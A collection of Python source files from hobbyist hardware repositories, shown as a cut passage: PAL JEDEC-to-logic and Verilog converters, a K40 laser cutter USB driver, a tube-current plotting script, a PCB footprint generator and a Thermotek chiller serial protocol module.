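#   canvas.paste(img, img.width(), 0)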
``` |
{
"source": "JohnDMcMaster/superpal",
"score": 2
} |
#### File: JohnDMcMaster/superpal/pal16r8_jed_to_wincupl.py
```python
def main():
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('jed_in')
args = parser.parse_args()
f = open(args.jed_in, 'r')
data = f.readlines()
f.close()
# crappy jedec parser
allbits = []
for l in data:
l = l.strip()
        if l and l[0] == 'L':
_addr = int(l[1:6])
bits = l[7:-1]
allbits.append(bits)
allbits = ''.join(allbits)
# TODO: move these into a config/net name file
inputnames = [
'CYC0', 'CYC1', 'CYC2', 'CYC3', 'INT_S0#', 'INT_S1#', 'INT_S2#',
'HIGH_BYTE'
]
#outputnames = []
#for i in range(8):
# outputnames.append('O%d' % (i+1))
# TODO: move these into a config/net name file
outputnames = ['O1', 'O2', 'UNK5', 'O4', 'U58_LE', 'UNK2', 'UNK3', 'O8']
# generate the english names for each input to the matrix
termnames = []
for i in range(8):
#termnames.append('I%d' % (i+2))
#termnames.append('!I%d' % (i+2))
termnames.append('%s' % (inputnames[i]))
termnames.append('!%s' % (inputnames[i]))
#termnames.append('O%d' % (i+1))
#termnames.append('!O%d' % (i+1))
termnames.append('%s' % (outputnames[i]))
termnames.append('!%s' % (outputnames[i]))
# TODO: fix magic numbers
# each output has 8 sum terms. (for the R. the L has an OE and 7 terms)
for outp in range(8):
list_sums = []
terms = allbits[(256 * outp):(256 * (outp + 1))]
for st in range(8):
list_prods = []
proterm = terms[(32 * st):(32 * (st + 1))]
# process product term
# if it is 1111..., then it is fixed at a logic high
# this means the corresponding output is always high.
if not ('0' in proterm):
list_prods = [1]
list_sums.append('1')
# if it is 0000...., then it is fixed at a logic low
# this means we get to skip this sum term
elif not ('1' in proterm):
pass
else:
for pt in range(32):
if proterm[pt] == '0':
list_prods.append(termnames[pt])
list_sums.append('(' + ' & '.join(list_prods) + ')')
#print(list_sums)
print(outputnames[outp] + ' = ' + ' | '.join(list_sums))
print('\n')
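# Entry point guard (assumption: this is run as a standalone script, mirroring
# pal16xx_jed_to_verilog.py below, which does the same thing).
if __name__ == "__main__":
    main()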
```
#### File: JohnDMcMaster/superpal/pal16xx_jed_to_verilog.py
```python
from superpal.verilog.jed_to_verilog import run
def main():
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('--metadata', help="Supplemental parsing data ")
parser.add_argument('jed_in')
parser.add_argument('v_out')
args = parser.parse_args()
run(args.jed_in, args.v_out, metadata_fn=args.metadata)
if __name__ == "__main__":
main()
```
#### File: superpal/verilog/pal16r8.py
```python
from collections import OrderedDict
import re
import json
import subprocess
from . import vutil
class PAL16R8(vutil.PAL):
def __init__(self, *args, **kwargs):
self.PIN_CLK = 1
self.PIN_OEn = 11
vutil.PAL.__init__(self, *args, **kwargs)
def part(self):
return "PAL16R8"
def is_io_pinn(self, pinn):
return pinn not in (self.PIN_GND, self.PIN_VCC, self.PIN_CLK,
self.PIN_OEn)
def create_sim_mask(self):
"""
Register setup is not reliable
So only keep things that depend on inputs, not regs
"""
# By package pin number
self.looped = {}
for (lhs_net, equation) in self.view.equations.items():
_lhs_isinv, (lhs_bus, lhs_pinn), _oper, rhs_terms = equation
self.looped[lhs_pinn] = False
for (lhs_net, equation) in self.view.equations.items():
_lhs_isinv, (lhs_bus, lhs_pinn), _oper, rhs_terms = equation
for termi, term in enumerate(rhs_terms):
# Skip operators
if termi % 2 == 1:
continue
rhs_net, _lhs_isinv, _rhs_buspinn = term
if "i" not in rhs_net:
self.looped[lhs_pinn] = True
break
def verilog_write_pal(self, f, terms):
def line(l):
f.write(l + "\n")
line('module dut(')
line(' input wire clk,')
line(' input wire oen,')
line(' input wire [%u:0] i,' % (self.get_npins_in() - 1, ))
line(' output wire [%u:0] o' % (self.get_npins_out() - 1, ))
line(' );')
def rname(pinn):
return self.pin_n2verilog(pinn).replace("o", "oreg").replace(
'[', '').replace(']', '')
# Register definitions
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(" reg %s = 1'b1;" % (rname(pinn), ))
line("")
# Assign output wires to internal regs
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(" assign %s = oen ? 1'bz : %s;" %
(self.pin_n2verilog(pinn), rname(pinn)))
line("")
# Main logic
line(' always @(posedge clk) begin')
for pinn, func in self.PINS_DUT.items():
if func == "o":
line(' %s <= %s;' %
(rname(pinn), terms[self.pin_n2verilog(pinn)]))
line(' end')
line('endmodule')
def verilog_write_top(self, f):
def line(l):
f.write(l + "\n")
# CLK, OEn
nepromi = self.get_npins_in() + 2
"""
1024 entries
100 ns per entry
"""
# sim_time = 102500
sim_step = 100
# clk step + addr step
sim_time = ((1 << nepromi) + 1) * sim_step
line("module sim_top();")
line("""
initial begin
$dumpfile("dut.vcd");
$dumpvars(0, sim_top);
end
initial begin
# %u $finish;
end
""" % sim_time)
# readpal: EPROM LSB is CLK
line(" reg [%u:0] epromi = %u'b0;" % (nepromi - 1, nepromi))
line(" wire clk = epromi[0];")
line(" wire oen = epromi[9];")
# Skip CLK, OEn
line(" wire [%u:0] pali = {epromi[8:1]};" %
(self.get_npins_in() - 1, ))
line(" wire [%u:0] palo;" % (self.get_npins_out() - 1, ))
line("""
always #%u begin
epromi = epromi + %u'b1;
end
""" % (sim_step, nepromi))
'''
line("""
always #%u begin
clk = ~clk;
end""" % (sim_step, ))
'''
line("""
dut dut(
.clk(clk),
.oen(oen),
.i(pali),
.o(palo));
""")
ifmt = "%b" * nepromi
ofmt = "%b" * self.get_npins_out()
iargs = ", ".join("epromi[%u]" % (nepromi - i - 1)
for i in range(nepromi))
oargs = ", ".join("palo[%u]" % (self.get_npins_out() - i - 1)
for i in range(self.get_npins_out()))
line("""
initial
$monitor("t=%t, i=""" + ifmt + """, o=""" + ofmt + """",
$time,
""" + iargs + """,
""" + oargs + """);
endmodule
""")
def verilog_write(self, terms, fn_out):
f = open(fn_out, "w")
def line(l):
f.write(l + "\n")
line('`default_nettype none')
line('')
self.verilog_write_pal(f, terms)
line('')
self.verilog_write_top(f)
``` |
{
"source": "JohnDMcMaster/uvscada",
"score": 2
} |
#### File: uvscada/k40/k40.py
```python
import usb.core
import usb.util
from egv import egv
import time
import traceback
##############################################################################
#### Status query responses ####
S_OK = 206
# Buffer full
S_BUFF_FULL = 238
# CRC error
S_CRC_ERR = 207
S_UNK1 = 236
# after failed initialization followed by successful initialization
S_UNK2 = 239
#######################
PKT_STATUS = [160]
PKT_UNLOCK = [166,0,73,83,50,80,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,15]
PKT_HOME = [166,0,73,80,80,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,228]
PKT_ESTOP = [166,0,73,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,130]
class K40_CLASS:
def __init__(self):
self.dev = None
self.n_timeouts = 1
self.timeout = 200 # Time in milliseconds
self.write_addr = 0x2 # Write address
self.read_addr = 0x82 # Read address
self.read_length= 168
def get_status(self):
# "get_hello"
#255, 206, 111, 8, 19, 0
cnt=0
while cnt<self.n_timeouts:
try:
self.send_packet(PKT_STATUS)
break
except:
raise
pass
cnt=cnt+1
if cnt == self.n_timeouts:
msg = "Too Many Transmission Errors (%d Status Timeouts)" %(cnt)
raise StandardError(msg)
response = None
read_cnt = 0
while response is None and read_cnt < 10:
try:
response = self.dev.read(self.read_addr,self.read_length,self.timeout)
# Timeout
except usb.core.USBError:
response = None
read_cnt = read_cnt + 1
DEBUG = False
if response != None:
if DEBUG:
if int(response[0]) != 255:
print "0: ", response[0]
elif int(response[1]) != 206:
print "1: ", response[1]
elif int(response[2]) != 111:
print "2: ", response[2]
elif int(response[3]) != 8:
print "3: ", response[3]
elif int(response[4]) != 19: #Get a 3 if you try to initialize when already initialized
print "4: ", response[4]
elif int(response[5]) != 0:
print "5: ", response[5]
else:
print ".",
if response[1]==S_OK or \
response[1]==S_BUFF_FULL or \
response[1]==S_CRC_ERR or \
response[1]==S_UNK1 or \
response[1]==S_UNK2:
return response[1]
else:
return None
else:
return None
def unlock_rail(self):
self.send_packet(PKT_UNLOCK)
def e_stop(self):
self.send_packet(PKT_ESTOP)
def home_position(self):
self.send_packet(PKT_HOME)
def reset_usb(self):
self.dev.reset()
def release_usb(self):
if self.dev:
usb.util.dispose_resources(self.dev)
self.dev = None
#######################################################################
# The one wire CRC algorithm is derived from the OneWire.cpp Library
# The latest version of this library may be found at:
# http://www.pjrc.com/teensy/td_libs_OneWire.html
#######################################################################
def OneWireCRC(self,line):
crc=0
for i in range(len(line)):
inbyte=line[i]
for j in range(8):
mix = (crc ^ inbyte) & 0x01
crc >>= 1
if (mix):
crc ^= 0x8C
inbyte >>= 1
return crc
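    # Cross-reference (illustrative): send_data() below finalizes each 34-byte
    # packet with
    #   packet[-1] = self.OneWireCRC(packet[1:len(packet)-2])
    # i.e. the CRC covers bytes 1..31, everything between the leading 0xA6 (166)
    # and the trailing 0xA6/CRC pair.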
#######################################################################
def none_function(self,dummy=None):
#Don't delete this function (used in send_data)
pass
print 'GUI: ', dummy
def send_data(self,data,update_gui=None,stop_calc=None,passes=1,preprocess_crc=True):
print 'send data begin'
if stop_calc == None:
stop_calc=[]
stop_calc.append(0)
if update_gui == None:
update_gui = self.none_function
blank = [166,0,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,166,0]
packets = []
packet = blank[:]
cnt=2
len_data = len(data)
for j in range(passes):
if j == 0:
istart = 0
else:
istart = 1
data[-4]
if passes > 1:
if j == passes-1:
data[-4]=ord("F")
else:
data[-4]=ord("@")
for i in range(istart,len_data):
if cnt > 31:
packet[-1] = self.OneWireCRC(packet[1:len(packet)-2])
if not preprocess_crc:
self.send_packet_w_error_checking(packet,update_gui,stop_calc)
update_gui("Sending Data to Laser = %.1f%%" %(100.0*float(i)/float(len_data)))
else:
packets.append(packet)
update_gui("Calculating CRC data and Generate Packets: %.1f%%" %(100.0*float(i)/float(len_data)))
packet = blank[:]
cnt = 2
if stop_calc[0]==True:
raise StandardError("Action Stopped by User.")
packet[cnt]=data[i]
cnt=cnt+1
packet[-1]=self.OneWireCRC(packet[1:len(packet)-2])
if not preprocess_crc:
self.send_packet_w_error_checking(packet,update_gui,stop_calc)
else:
packets.append(packet)
packet_cnt = 0
print 'send data sending'
for line in packets:
update_gui()
self.send_packet_w_error_checking(line,update_gui,stop_calc)
packet_cnt = packet_cnt+1.0
update_gui( "Sending Data to Laser = %.1f%%" %( 100.0*packet_cnt/len(packets) ) )
##############################################################
print 'send data done'
def send_packet_w_error_checking(self,line,update_gui=None,stop_calc=None):
print 'send w/ error start'
timeout_cnt = 0
crc_cnt = 0
while timeout_cnt < self.n_timeouts and crc_cnt < self.n_timeouts:
try:
self.send_packet(line)
except:
raise
msg = "USB Timeout #%d" %(timeout_cnt)
print 'USB timeout'
update_gui(msg)
timeout_cnt=timeout_cnt+1
continue
######################################
response = self.get_status()
print 'response', response
if response == S_BUFF_FULL:
print 'buffer full'
while response == S_BUFF_FULL:
response = self.get_status()
break #break and move on to next packet
elif response == S_CRC_ERR:
msg = "Data transmission (CRC) error #%d" %(crc_cnt)
update_gui(msg)
crc_cnt=crc_cnt+1
continue
elif response == None:
msg = "Controller board is not responding."
update_gui(msg)
break #break and move on to next packet
else: #response == S_OK:
break #break and move on to next packet
#elif response == S_UNK1:
# msg = "Something UNKNOWN_1 happened: response=%s" %(response)
# break #break and move on to next packet
#elif response == S_UNK2:
# msg = "Something UNKNOWN_2 happened: response=%s" %(response)
# break #break and move on to next packet
#else:
# msg = "Something Undefined happened: response=%s" %(response)
# break #break and move on to next packet
if crc_cnt >= self.n_timeouts:
msg = "Too Many Transmission Errors (%d CRC Errors)" %(crc_cnt)
update_gui(msg)
raise StandardError(msg)
if timeout_cnt >= self.n_timeouts:
msg = "Too Many Transmission Errors (%d Timeouts)" %(timeout_cnt)
update_gui(msg)
raise StandardError(msg)
if stop_calc[0]:
msg="Action Stopped by User."
update_gui(msg)
raise StandardError(msg)
def send_packet(self,line):
print 'sending packet'
self.dev.write(self.write_addr,line,self.timeout)
print 'sent'
def rapid_move(self,dxmils,dymils):
data=[]
egv_inst = egv(target=lambda s:data.append(s))
egv_inst.make_move_data(dxmils,dymils)
self.send_data(data)
def initialize_device(self,verbose=False):
try:
self.release_usb()
except:
pass
raise
# find the device
self.dev = usb.core.find(idVendor=0x1a86, idProduct=0x5512)
if self.dev is None:
raise StandardError("Laser USB Device not found.")
#return "Laser USB Device not found."
# set the active configuration. With no arguments, the first
# configuration will be the active one
try:
self.dev.set_configuration()
except:
raise
#return "Unable to set USB Device configuration."
raise StandardError("Unable to set USB Device configuration.")
# get an endpoint instance
cfg = self.dev.get_active_configuration()
intf = cfg[(0,0)]
ep = usb.util.find_descriptor(
intf,
# match the first OUT endpoint
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_OUT)
if ep == None:
raise StandardError("Unable to match the USB 'OUT' endpoint.")
# ?
self.dev.ctrl_transfer( 0x40, 177, 0x0102, 0, 0, 2000)
#PKT_STATUS_sync()
def hex2dec(self,hex_in):
#format of "hex_in" is ["40","e7"]
dec_out=[]
for a in hex_in:
dec_out.append(int(a,16))
return dec_out
if __name__ == "__main__":
k40=K40_CLASS()
run_laser = False
k40.initialize_device(verbose=False)
#k40.initialize_device()
print (k40.get_status())
#print k40.reset_position()
#print k40.unlock_rail()
print ("DONE")
# origin at lower left
# this also seems to crash it...
# also its not running the init sequence
# hmm
def move(self,dxmils,dymils, laser_on):
data=[]
print 'Making egv'
egv_inst = egv(target=lambda s:data.append(s))
print 'Making data'
egv_inst.make_move_data(dxmils,dymils, laser_on=laser_on)
print 'Sending data'
self.send_data(data)
print 'Data sent'
#ON = 68 #ord("D")=68
#OFF = 85 #ord("U")=85
if 1:
for _i in xrange(3):
move(k40, 200,200, True)
move(k40, -200,-200, True)
move(k40, 200,200, False)
move(k40, -200,-200, False)
'''
Each loop taking about 135-138 ms, even with the print
Often it will stall on the very first move
Manual has EMI note
Possibly they
Additionally, a ^C causes some weird issues and doesn't actually exit
Review their exception handling logic
'''
if 0:
iters = 0
while True:
iters += 1
for coords in [(200, 200), (-200, -200), (-200, 200), (200, -200)]:
dx, dy = coords
print
print
print
print iters
tstart = time.time()
#move(k40, dx, dy, False)
response = k40.get_status()
print 'response', response
continue
dt = time.time() - tstart
print 'dt: %3.3f' % dt
if dt > 0.140:
raise Exception("RT failure")
move(k40, 1, 1, False)
move(k40, -1,-1, False)
```
#### File: uvscada/nuc/gmchar_plt_pmt.py
```python
import argparse
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import json
def load_csv(f):
f = open(f, 'r')
data = []
print 'Loading'
for l in f:
try:
j = json.loads(l)
except:
break
data.append(j['v'])
return data
def load_jl(f):
f = open(f, 'r')
# skip metadata
f.readline()
data = []
print 'Loading'
for l in f:
try:
j = json.loads(l)
except:
break
data.append((j['v'], -j['iavg'] * 1e6))
if 1:
data2 = []
for i, d in enumerate(data):
v, i = d
if v >= 220:
data2.append(d)
data = data2
# normalize
if 1:
imin = min([x[1] for x in data])
if imin < 0:
for i, (v, iavg) in enumerate(data):
data[i] = (v, iavg - imin)
data = data[1:]
return data
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Help')
parser.add_argument('fn', help='File')
args = parser.parse_args()
print 'Looping'
fn = args.fn
print
print fn
fn_out = fn.replace('.jl', '.png')
if fn_out == fn:
raise Exception()
data = load_jl(fn)
# x mv y V
print 'Plotting (%d samples)' % (len(data),)
plt.semilogy(*zip(*data))
#fig = plt.gcf()
#fig.set_ylim(1e-2, 1e2)
ax = plt.gca()
ax.set_ylim(1e-2, 1e2)
plt.xlabel('Tube voltage')
plt.ylabel('Tube uA')
plt.savefig(fn_out)
#plt.show()
# average current 500 - 700 v
meas = []
for i, d in enumerate(data):
v, i = d
if v >= 500 and v <= 700:
meas.append(i)
print 'Center average: %0.3f' % (sum(meas) / len(meas),)
```
#### File: uvscada/pcb/points.py
```python
import math
def simple():
'''
3.14 * 0.5 = 1.57
1.57 / 40 = 0.03925
take half => 0.019625
20 mil diameter pads
rond
6 mil fab rule?
20 mil hole, 10 mil ring each side
should be fine
eh pretty tight
lets shrink slightly
'''
D = 0.5
R = D / 2
PINS = 40
for i in xrange(PINS):
pin = i + 1
angle = (i + 0.5) * 2 * math.pi / PINS
if angle > 2 * math.pi:
angle -= 2 * math.pi
angle = -angle
x = R * math.sin(angle)
y = R * math.cos(angle)
print '% 3d: % 4d x % 4d y % 5d r' % (pin, 1000 * x, 1000 * y, -360 * angle / 3.14 / 2 )
'''
autogen
pcad.lia simple
.dxf may also work
figured out how to import .lia
do that
OSH rules
https://oshpark.com/guidelines
6 mil minimum trace width
6 mil minimum spacing
at least 15 mil clearances from traces to the edge of the board
13 mil minimum drill size
7 mil minimum annular ring
pcbway rules
http://www.pcbway.com/capabilities.html
drill size
Min drill size is 0.2mm,
7.9 mil
max drill is 6.3mm.
Any holes greater than 6.3mm or smaller than 0.3mm will be subject to extra charges.
6.3: 248 mil
0.3: 11.8 mil
Min Width of Annular Ring
0.15mm(6mil)
Minimum Diameter of Plated Half Holes
0.6mm
eeeeh
that messes up what I'm trying to do
23.6 mil
actually maybe its okay
so in summary
current
hole: 13
annular ring: 7
net size: 27
move to
hole: 12
annular ring: 6
net size: 24
eliminated most but not all
need 1 more mil
hole 12
0.5 * 3.14159 = 1.570795
1.570795 / 28 = 0.056099821
56 mil
6 mil spacing min
7 mil minimum annular ring
0.1" fencepost ref
40
68
9 mil ring
say 9 mil spacing
9 mil ring
56 - 9 - 2 * 9 = 29 hole
wait no hole
just do it evenly
56/2 = 28
'''
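# Worked check of the pitch arithmetic above (illustrative): the circumference of
# a 0.5" diameter ring is pi * 0.5 ~= 1.571", and 1.571 / 28 positions ~= 0.0561"
# (56 mil) pitch, which is where the 28 mil pad / 28 mil gap split below comes from.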
def header():
return '''\
ACCEL_ASCII "POINTS.LIA"
(asciiHeader
(asciiVersion 3 0)
(timeStamp 2017 1 7 0 54 1)
(program "points.py" "1.0.0")
(copyright "points.py")
(headerString "")
(fileUnits Mil)
(guidString "{00000000-0000-0000-0000-000000000000}")
)
(library "Library_1"
(padStyleDef "(Default)"
(holeDiam 30mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerNumRef 2) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "EF20X60TOP1"
(holeDiam 0mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 20mil) (shapeHeight 60mil) )
(padShape (layerNumRef 2) (padShapeType Ellipse) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "P:EX30Y30D201"
(holeDiam 12mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerNumRef 2) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "RECT28"
(holeDiam 0mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Rect) (shapeWidth 28mil) (shapeHeight 28mil) )
(padShape (layerNumRef 2) (padShapeType Ellipse) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Signal) (padShapeType Rect) (shapeWidth 28mil) (shapeHeight 28mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(viaStyleDef "(Default)"
(holeDiam 28mil)
(startRange 1)
(endRange 2)
(viaShape (layerNumRef 1) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerNumRef 2) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerType Signal) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerType Plane) (viaShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(viaShape (layerType NonSignal) (viaShapeType Ellipse) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(textStyleDef "(Default)"
(font
(fontType Stroke)
(fontFamily Modern)
(fontFace "Quality")
(fontHeight 80mil)
(strokeWidth 10mil)
)
(textStyleAllowTType False)
(textStyleDisplayTType False)
)
(textStyleDef "(DefaultTTF)"
(font
(fontType Stroke)
(fontFamily SanSerif)
(fontFace "QUALITY")
(fontHeight 100.0)
(strokeWidth 10.0)
)
(font
(fontType TrueType)
(fontFamily Modern)
(fontFace "Arial")
(fontHeight 125.0)
(strokeWidth 0.19843 mm)
(fontWeight 400)
(fontCharSet 0)
(fontOutPrecision 7)
(fontClipPrecision 32)
(fontQuality 1)
(fontPitchAndFamily 6)
)
(textStyleAllowTType True)
(textStyleDisplayTType True)
)
(patternDefExtended "ROUND40-0.5_1"
(originalName "ROUND40-0.5")
(patternGraphicsNameRef "Primary")
(patternGraphicsDef
(patternGraphicsNameDef "Primary")
(multiLayer
'''
def footer(pins):
s = '''\
)
(layerContents (layerNumRef 10)
(arc (pt 0mil 0mil) (radius 250mil) (startAngle 0.0) (sweepAngle 360.0) (width 10mil) )
)
(layerContents (layerNumRef 6)
(attr "RefDes" "" (pt -266.767mil 294.091mil) (isVisible True) (textStyleRef "(Default)") )
(attr "Type" "" (pt -266.767mil -389mil) (isVisible True) (textStyleRef "(Default)") )
)
)
)
(compDef "ROUND40-0.5_1"
(originalName "ROUND40-0.5")
(compHeader
(sourceLibrary "")
(numPins 40)
(numParts 1)
(alts (ieeeAlt False) (deMorganAlt False))
(refDesPrefix "")
)
'''
for i in xrange(pins):
'''
(compPin "1" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
(compPin "2" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
(compPin "3" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
...
(compPin "40" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
'''
pin = i + 1
s += ' (compPin "%d" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )\n' % (pin,)
s += '''\
(attachedPattern (patternNum 1) (patternName "ROUND40-0.5")
(numPads 40)
(padPinMap
'''
for i in xrange(pins):
'''
(padNum 1) (compPinRef "1")
(padNum 2) (compPinRef "2")
(padNum 3) (compPinRef "3")
...
(padNum 40) (compPinRef "40")
'''
pin = i + 1
s += ' (padNum %d) (compPinRef "%d")\n' % (pin, pin)
s += '''\
)
)
)
)
'''
return s
def auto(PINS=40, D=0.5, padStyleRef="EF20X60TOP1"):
R = D / 2
s = header()
for i in xrange(PINS):
pin = i + 1
angler = (i + 0.5) * 2 * math.pi / PINS
angler = -angler
angled = angler * 180 / math.pi
x = R * math.sin(angler)
y = R * math.cos(angler)
'''
(pad (padNum 1) (padStyleRef "EF20X60TOP1") (pt -19mil 249mil) (rotation 4.0)(defaultPinDes "1"))
(pad (padNum 2) (padStyleRef "EF20X60TOP1") (pt -58mil 243mil) (rotation 13.0)(defaultPinDes "2"))
(pad (padNum 3) (padStyleRef "EF20X60TOP1") (pt -95mil 230mil) (rotation 22.0)(defaultPinDes "3"))
'''
# Rotation CW
# Need to counter above rotation
l = ' (pad (padNum %d) (padStyleRef "%s") (pt %dmil %dmil) (rotation %0.1f)(defaultPinDes "%d"))\n' % (pin, padStyleRef, 1000 * x, 1000 * y, -angled, pin)
s += l
s += footer(PINS)
print s
# Original design
# Elongated oval pad sliced in the middle
#auto(PINS=40, D=0.5, padStyleRef="EF20X60TOP1")
# castillation
#auto(PINS=40, D=0.5, padStyleRef="P:EX30Y30D201")
# diameter
# pad size/2
# solder mask expansion
# edge clearance
#auto(PINS=28, D=0.5+0.056/2+2*0.004+2*0.006, padStyleRef="RECT28")
auto(PINS=28, D=0.45+0.056/2+2*0.004+2*0.006, padStyleRef="RECT28")
```
#### File: uvscada/thermotek/t251p.py
```python
import serial
import binascii
import datetime
import time
'''
comm error status - Single ASCII byte that indicates any error in the last
command received. The errors are as follows:

    No Error               - 30h (0)
    Checksum Error         - 31h (1)
    Bad Command            - 32h (2)
    Out of Bound Qualifier - 33h (3)
'''
err_i2s = {
'0': 'NONE', # No Error
'1': 'CHECKSUM', # Checksum Error
'2': 'BAD_CMD', # Bad Command
'3': 'OOB', # Out of Bound Qualifier
}
XON = '\x11'
XOFF = '\x13'
SOC = '.'
CR = '\x0D'
class BadPacket(Exception):
pass
def calc_checksum(buff):
'''Calculate checksum, returned in expected ASCII format'''
return '%02X' % (sum(bytearray(buff)) & 0xFF)
def cmd_encode(cmd_code, opts='', soc='\x2E', checksum=None, cr='\x0D'):
    '''
    2.1 Command Format

    The command issued by the PC will be in the following format:

        soc | command code | n optional qualifiers | checksum | cr

    where soc is the start-of-command byte (2Eh, ASCII '.'), cr is the ASCII
    carriage return (0Dh), and checksum is two ASCII hex characters (see
    calc_checksum).
    '''
cmd_code = str(cmd_code)
assert len(cmd_code) == 1
tocheck = soc + cmd_code + opts
if checksum is None:
# ASCI protcool, so checksum is sent as ASCII
checksum = calc_checksum(tocheck)
return tocheck + checksum + cr
def response_decode(buff):
    '''
    2.2 Response Format

    Every command requires a response of some sort. The general form of the
    response is:

        sor | command echo | comm error status | n response | checksum | cr

    Where
        sor               - Start of Response. The command starts with a 23h
                            representing an ASCII #. It is one byte in length.
        command echo      - Echo the last received valid command.
        comm error status - Single ASCII byte that indicates any error in the
                            last command received. The errors are as follows:
                                No Error               - 30h (0)
                                Checksum Error         - 31h (1)
                                Bad Command            - 32h (2)
                                Out of Bound Qualifier - 33h (3)
        n response        - data, alarms messages, status conditions as
                            requested by the command
        checksum          - two ASCII hexadecimal bytes representing the least
                            significant 8 bits of the sum of all preceding
                            bytes of the command starting with the sor.
        cr                - ASCII carriage return 0Dh
    '''
if buff is None:
raise ValueError("packet buff is None")
sor = buff[0]
if sor != '\x23':
raise BadPacket("Bad sor")
cr = buff[-1]
if cr != '\x0D':
raise BadPacket("Bad cr")
    # Per the response format above: two ASCII hex checksum chars precede the cr
    checksum_got = buff[-3:-1]
    checksum_calc = calc_checksum(buff[0:-3])
    if checksum_got != checksum_calc:
        raise BadPacket("Bad checksum")
    last_cmd = buff[1]
    err = err_i2s[buff[2]]
    response = buff[3:len(buff) - 3]
return last_cmd, err, response
class T251P(object):
def __init__(self, port="/dev/ttyUSB0", ser_timeout=0.10, ser=None):
self.verbose = True
if not ser:
ser = serial.Serial(port,
baudrate=9600,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
# sucks..doesn't packetize reads
#xonxoff=True,
xonxoff=False,
timeout=ser_timeout,
# Blocking writes
writeTimeout=None)
self.ser = ser
#self.ser.flushInput()
#self.ser.flushOutput()
#self.flush()
self.rxbuff = ''
self.xon = False
def flush(self):
timeout = self.ser.timeout
try:
self.ser.timeout = 0.1
while True:
l = self.ser.readline()
# finished command in progress => flushed
if not l:
return
# a finished command => done
if l[-1] == '\n':
return
finally:
self.ser.timeout = timeout
def snd(self, cmd_code, opts):
encoded = cmd_encode(cmd_code, opts)
out = XON + encoded + XOFF
if self.verbose:
print('TX: %s' % binascii.hexlify(out))
print("TX ASCII: %s" % encoded[0:-1])
self.ser.write(out)
self.ser.flush()
def recv(self):
'''
WD packets are XON without XOFF
Normal packets are XON + data + XOFF
'''
self.rxbuff += self.ser.read(16)
print('Got %u: %s' % (len(self.rxbuff), binascii.hexlify(self.rxbuff)))
while True:
xon_pos = self.rxbuff.find(XON)
xoff_pos = self.rxbuff.find(XOFF)
#print(xon_pos, xoff_pos, len(self.rxbuff))
if xon_pos < 0 and xoff_pos < 0:
return None
# Process new xon if its not going to interrupt a valid packet
if xon_pos >= 0 and (xoff_pos < 0 or xon_pos < xoff_pos):
self.rxbuff = self.rxbuff[xon_pos + 1:]
self.xon = True
if self.verbose:
print('rx XON')
continue
if xoff_pos >= 0:
packet = self.rxbuff[0:xoff_pos + 1]
self.rxbuff = self.rxbuff[xoff_pos + 1:]
if not self.xon:
if self.verbose:
print('WARNING: packet missing XON')
continue
else:
assert packet[-1] == XOFF
                    # Strip the trailing XOFF before decoding (decode expects cr last)
                    return response_decode(packet[:-1])
def cmd(self, cmd_code, opts='', timeout=1.5):
# watchdog requests may have stacked up
#self.ser.flushInput()
self.snd(cmd_code, opts)
tstart = time.time()
while True:
if time.time() - tstart > timeout:
